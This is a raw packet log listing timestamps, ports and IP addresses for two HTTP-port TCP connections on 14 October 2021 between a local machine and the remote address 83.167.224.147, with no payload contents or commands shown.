Oct 14, 2021 08:38:58.675148964 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675158978 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675168991 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675178051 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675188065 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675198078 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675208092 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675218105 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675228119 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675237894 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675247908 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675257921 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675267935 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675277948 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675286055 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675287962 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675293922 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675296068 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675297976 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675307989 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675318003 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675328016 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675338030 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675348043 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675358057 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675368071 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675378084 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675388098 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675398111 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675406933 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675416946 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675426960 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675436020 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675446033 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675456047 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675462961 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675467014 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675467014 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675477028 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675487041 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675496101 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675506115 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675515890 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675525904 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675535917 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675545931 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.675638914 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675817966 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.675992012 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.695938110 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696079016 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696244955 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696257114 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696266890 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696275949 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696285963 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696295023 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696305990 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696320057 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696330070 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696338892 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696348906 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696357965 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696367979 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696403027 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696404934 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696578979 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696584940 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696587086 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696760893 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696764946 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696765900 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696765900 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696767092 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696767092 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696767092 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696768045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696768045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696768999 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696768999 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696769953 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696769953 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.696933985 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.696937084 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697016001 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697024107 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697025061 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697026014 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697026014 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697026968 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697026968 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697027922 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697027922 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697027922 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697029114 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697029114 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697030067 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697030067 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697030067 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697031021 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697031021 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697031021 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697031975 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697031975 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697032928 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697042942 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697052002 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697062016 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697071075 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697192907 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697199106 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697200060 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697201014 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697201014 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697201967 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697201967 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697201967 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697202921 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697202921 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697204113 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697204113 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697213888 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697222948 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697232962 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697241068 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697242022 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697252035 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697252035 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697261095 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697271109 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697279930 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697288990 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697299004 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697412968 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697418928 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697421074 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697422028 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697422028 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697422981 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697422981 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697422981 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697423935 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697424889 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697432995 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697443008 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697452068 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697463036 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697472095 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697482109 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697490931 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697561979 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697741985 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697741985 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697745085 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697745085 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697746038 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697746038 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697746038 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697746992 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697746992 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697747946 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697751045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697751045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697751999 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697751999 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697752953 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697752953 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697753906 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697753906 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697755098 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697755098 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697756052 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697757006 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697757006 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697757959 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697757959 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697774887 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.697948933 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.697966099 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.698167086 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.698385000 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.716592073 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716603994 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716813087 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.716845989 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716857910 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716866970 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716876984 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716886044 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716895103 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716903925 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716912985 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716922045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716931105 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.716941118 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717174053 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717183113 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717190981 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717194080 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717195034 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717336893 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717349052 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717358112 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717366934 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717375994 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717386007 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717395067 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717403889 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717412949 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717603922 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717613935 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717623949 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717633009 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717642069 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717643976 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717652082 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717653990 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717820883 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.717865944 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.717875957 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718035936 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718041897 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718131065 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718142033 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718152046 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718161106 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718169928 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718178988 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718188047 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718197107 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718209028 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718221903 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718231916 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718240976 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718250036 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718259096 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718267918 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718276978 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718286991 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718296051 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718305111 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718313932 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718322992 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718333006 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718342066 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718350887 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718359947 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718369007 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718393087 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718399048 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718400955 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718491077 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718502045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718512058 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718521118 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718529940 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718539000 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718548059 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.718559980 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718739986 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.718928099 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.719093084 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.737452984 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.737714052 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.737812996 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.737912893 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.737965107 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738019943 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738069057 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738116980 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738164902 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738209963 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738269091 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738301039 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738348007 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738394022 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738424063 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738439083 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738445044 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738471031 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738486052 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738532066 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738575935 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738620996 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738648891 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738667011 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738713980 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738759041 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738804102 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738828897 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738846064 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738848925 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738854885 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738862991 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.738897085 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738944054 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.738989115 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739032984 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739078045 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739106894 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739125013 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739171982 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739181995 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739202023 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739217043 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739263058 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739309072 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739355087 CEST	80	49804	83.167.224.147	192.168.11.20
Oct 14, 2021 08:38:58.739361048 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739378929 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739562035 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739584923 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739593983 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:38:58.739892006 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:39:00.440372944 CEST	49804	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.879090071 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.899646044 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.899848938 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.900110006 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.920270920 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.921983004 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922044992 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922091961 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922137976 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922183037 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922228098 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922271967 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922317982 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922346115 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.922363043 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922388077 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:31.922413111 CEST	80	49808	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:31.922525883 CEST	49808	80	192.168.11.20	83.167.224.147
